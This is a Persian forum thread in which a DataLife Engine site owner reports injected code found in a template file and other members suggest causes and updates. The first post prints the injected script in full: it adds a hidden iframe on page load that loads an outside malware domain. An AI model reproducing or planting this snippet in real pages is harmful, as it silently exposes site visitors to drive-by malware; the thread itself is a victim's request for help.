پرش به


تصویر

حمله xss به main.tpl و اضافه شدن کد داخل آن


  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
3 پاسخ برای این موضوع

#1 hostmizban3

hostmizban3

    عضو جدید

  • عضو سایت
  • ستاره
  • 9 ارسال

ارسالی 1393/08/24 ساعت 13:46

با سلام خدمت دوستان عزیز در حال حاضر که باهاتون صحبت میکنم من 5 تا سایت با دیتالایف انجین بالا آوردم ولی مشکلی که دارم جدیدا داخل main.tpl وب سایت که بعد از مدتی دیدم کد زیر رو مشاهده میکنم که قبلا نبوده !!!! الان گوگل و ... هم از سایت ارور میگیرند و میگویند که نمیتونید وارد این وب سایت شوید با توجه به دلایل امنیتی این کدی بود که قرار دادم برایتون وب سایت منم : hostmizban.com هست که در حال حاضر کد رو ازش حذف کردم ولی این کد باعث ترس من شده ورژن دیتالایف انجین من 9.5 هستش ممنون میشم کمک کنید
کد :
<script>
if(document.loaded)
{
showBrowVer();
}
else
{
if (window.addEventListener)
{ window.addEventListener('load', showBrowVer, false);} else { window.attachEvent('onload', showBrowVer);}} function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2);} </script>

  • 0

#2 saeedi

saeedi

    عضو سایت

  • عضو سایت
  • ستارهستاره
  • 22 ارسال

ارسالی 1393/08/24 ساعت 13:51

هیچ ربطی به اسکریپت دیتالایف انجین یا قالب نداره و به اطمینان میگم به اسکریپت شما هیچ حمله ای نشده چون فعلا باگی برای دیتالایف انجین نیست
سرور مال خودته یا هاست اشتراکیه؟؟
  • 0

#3 BahmanM

BahmanM

    کاربر فعال انجمن

  • Validating
  • ستارهستارهستاره
  • 294 ارسال

ارسالی 1393/08/24 ساعت 14:37

سعی کن ورژن دیتالایف انجین رو بروزرسانی کنی چون باگهاش حذف میشن و پچهای امنیتی بهش اضافه میکنن .
با xss نمیتونه رویه این فایل چیزی بنویسه ، برای اطلاعات به گوگل رجوع کن کاراییشو میبینی
  • 0

#4 saeedi

saeedi

    عضو سایت

  • عضو سایت
  • ستارهستاره
  • 22 ارسال

ارسالی 1393/08/24 ساعت 19:14

بله پیرو صحبت دوستمون xss از طریق تزریق کد به درگاه های ورودی مثلا درخواست یک تابع درست از دیتابیس به جای پسورد هستش.
ضمنا دوستمون درست میگن دیتالایف انجینتون رو به روز کنید چون برای این ورژن باگ وجود داره.
اون هم نه یکی بلکه 2 تا که قابل توجهتون تا 9.7 هم کار میکنه.

اطلاعات گوگل ------------------------------------------------------------
مرور ایمن
صفحه تشخیصی برای hostmizban.com

وضعیت فعلی لیست برای hostmizban.com چیست؟

سایت مشکوک ذکر شده - بازدید از این وب سایت ممکن است به رایانه شما آسیب برساند.

بخشی از این سایت برای فعالیت های مشکوک 1 زمان (بازدید کنندگان) بیش از 90 روز گذشته ذکر شده بود.

چه اتفاقی افتاد وقتی که گوگل این سایت بازدید؟

از 21 صفحه ما در سایت بیش از 90 روز گذشته تست شده، 10 صفحه (بازدید کنندگان) منجر به نرم افزار های مخرب در حال دانلود و نصب بدون رضایت کاربر. آخرین زمان گوگل از این سایت بازدید 2014/11/14 در بود، و آخرین بار محتوای مشکوک در این سایت یافت شد در 2014/11/14 بود.

نرم افزار های مخرب در 1 دامنه (ها)، از جمله 24corp-shop.com/ میزبانی.

این سایت را در شبکه 1 (ها) از جمله AS30496 (COLO4) برگزار شد.

این سایت به عنوان یک واسطه و در نتیجه توزیع بیشتر بدافزار عمل کرده؟

در طول 90 روز گذشته، hostmizban.com به نظر نمی رسد به عنوان یک واسطه برای عفونت از هر سایت تابع.

تا به این سایت میزبانی بدافزارها؟

نه، این سایت تا به نرم افزار های مخرب در طول 90 روز گذشته به میزبانی نیست.

چگونه این اتفاق افتاد؟

در برخی موارد، اشخاص ثالث می توانند کدهای مخرب به سایت های مشروع، که باعث می شود ما را به نشان می دهد پیام های هشدار دهنده را اضافه کنید.

مراحل بعدی:

بازگشت به صفحه قبل.
اگر شما صاحب این وب سایت، شما می توانید یک بررسی از سایت خود را با استفاده از ابزار وب مستر گوگل درخواست. اطلاعات بیشتر در مورد روند بررسی های موجود در وب مستر مرکز راهنما است.
  • 0


1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی